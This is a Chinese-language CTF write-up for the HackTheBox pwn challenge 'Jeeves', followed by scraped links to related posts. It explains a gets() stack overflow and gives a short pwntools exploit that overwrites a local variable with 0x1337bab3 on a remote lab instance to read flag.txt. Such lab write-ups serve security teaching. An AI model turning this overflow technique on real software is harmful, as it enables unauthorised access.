HackTheBox-Jeeves
文章目录
- 概述
- 题目概述
- 基本信息获取
- 使用gdb分析程序
- 解题思路
- 解题代码
概述
HackTheBox 网站CTF靶场PWN相关题目Jeeves,题目地址https://app.hackthebox.com/challenges/jeeves,主要考点为缓冲区溢出。
题目概述
下载附件Jeeves.zip并解压缩得到jeeves,对应的远程服务器实例为178.62.74.50:31534
基本信息获取
直接运行程序,输入test
,得到一个回应
查看加固措施
查看程序中的字符串,发现有flag.txt
abin2 -z jeeves
[Strings]
nth paddr vaddr len size section type string
―――――――――――――――――――――――――――――――――――――――――――――――――――――――
0 0x00002008 0x00002008 39 40 .rodata ascii Hello, good sir!\nMay I have your name?
1 0x00002030 0x00002030 36 37 .rodata ascii Hello %s, hope you have a good day!\n
2 0x00002055 0x00002055 8 9 .rodata ascii flag.txt
3 0x00002060 0x00002060 59 60 .rodata ascii Pleased to make your acquaintance. Here's a small gift: %s\n
使用gdb分析程序
查看main函数
发现通过gets函数接收输入,位置在rbp-0x40
,在0x555555555236
出有一个比较,比较rbp-4
处的值与0x1337bab3,如果不相等,跳转到程序结束,如果相等,执行打开flag.txt的指令。
解题思路
利用溢出溢出到rbp-4
处,修改其值为0x1337bab3,是比较相等,执行open函数读取flag.txt。
rbp-4
与rbp-0x40
的距离为60
解题代码
from pwn import *# p = process('./jeeves')
p = remote('178.62.74.50',31534)offset = 60payload = 'A' * 60 + p64(0x1337bab3)p.sendline(payload)
p.interactive()
HackTheBox-Jeeves相关推荐
- sqlmap md5怎么解密_三十九,hackthebox渗透之DirBuster扫描路径及Sqlmap
一.DirBuster扫描目录 hack the box是一个在线Web渗透实验平台,能帮助你提升渗透测试技能和黑盒测试技能,平台上有很多靶机,从易到难,各个级别的靶机都有.因为这些靶机放在平台上供大 ...
- Hackthebox(1)系列持续更新
Hackthebox第一关 文章目录 Hackthebox第一关 一.Hackthebox配置openvpn 配置openvpn 二.第0层(简单) 终端弄好以后点击产卵机,然后会给你创建一个实例 问 ...
- HackTheBox MetaTwo 网站框架CVE获取用户shell和破解私钥提权
题目网址: https://app.hackthebox.com/machines/MetaTwo 枚举 使用nmap枚举靶机 nmap -sC -sV -p- 10.10.11.186 扫到了域名, ...
- HackTheBox 如何使用
如何开始? 1.到官网注册一个账号 https://www.hackthebox.com/ 2.验证自己的邮箱 3.下载 openvpn 4.到左边的 labs 实验室开始学习或直接点击 start ...
- HackTheBox –Craft实战
HackTheBox –Craft ip:http://10.10.10.110/ 信息搜集 端口扫描:使用nmap扫描发现开了22(ssh)端口和443(http/ssl) 版本可从web网页上获取 ...
- CTF-Anubis HackTheBox 渗透测试(二)
大家好,我是你们好朋友小峰.预计从今天开始,陆陆续续为大家推出 CTF-Horizontall HackTheBox 系列文章. 0x01 简介 Anubis是由作者4ndr34z在Hac ...
- Hackthebox:Arctic Walkthrough
预备知识 使用了msfvenom,不想看的可以跳过 浏览器信息收集尤其是细节发现服务信息不能过度依赖工具 MS10-059.smbserver.jsp reverse shell 信息收集和获取立足点 ...
- hackthebox的网站使用教程
Google浏览器下载 下载url:https://www.google.cn/chrome/ hackthebox网站 网站url:https://www.hackthebox.com/home 获 ...
- 小黑客,2020还没有邀请码注册 hackthebox ?reCAPTCHA验证码加载不出来?
访问邀请码页面 https://www.hackthebox.eu/invite F12控制台输入 $.post('https://www.hackthebox.eu/api/invite/gener ...
- [Hackthebox]获取社区邀请码
获取Hackthebox邀请码教程 登录社区首页后,下拉页面,点击Join按钮进入邀请页面.我们需要通过该页面展示的信息,获取邀请码以注册社区账号.这是进入训练社区的一个小挑战. 流程 可以直接通过浏 ...
最新文章
- 2020年球云计算市值或将达4490亿欧元
- 8000 字 + 21 张图,服务端高并发分布式架构 14 次演进之路
- C语言遥控器程序,红外遥控
- 【已解决】Nacos启动报错:java.io.IOException: java.lang.IllegalArgumentException: db.num is null
- GridView RowCommand事件中取得當前行
- 在NSUserDefaults中存储自定义类型的数据
- 为什么这本搜索引擎营销的书畅销呢?
- 纯CSS3技术 加载中
- 【jvm jdk】锁状态位之偏向锁
- Windows 10 使用Easy Sysprep V5 新版封装软件的图文封装教程
- c语言专业面试问题,c语言面试问题(共3篇).doc
- Latex 求职简历模版
- oracle查询备份存储路径,Oracle数据库备份和恢复(导出,导入)
- Kafka生产者、消费者的消息可靠性方案实现
- python for循环次数_Python for循环
- C语言中文网教程导航
- 常见的网站攻击与防御,道高一尺,魔高一丈
- 后浪小萌新Python --- 字典
- schema testdb didn‘t config tables,so you must set dataNode property!
- linux下文件怎么改名字,Linux文件名字批量修改步骤 Linux修改文件名的方法
热门文章
- 用username.github.io在github创建一个个人空间
- Python实现TOPSIS分析法(优劣解距离法)
- Redis底层数据结构详解(一)
- iOS AVFoundation
- 关于python格式对齐的问题_解决python对齐错误的方法
- 5611AH 数码管 引脚图
- 微信签到抽奖程序java源码_某宝买的微信抽奖签到墙源码,年会,学习源码--已经配置完成了,源码没问题,可直接用...
- 如何管理软件开发项目?
- 微软“黑屏”被严重误读
- 基于爬虫爬取的数据,完成数据展示网站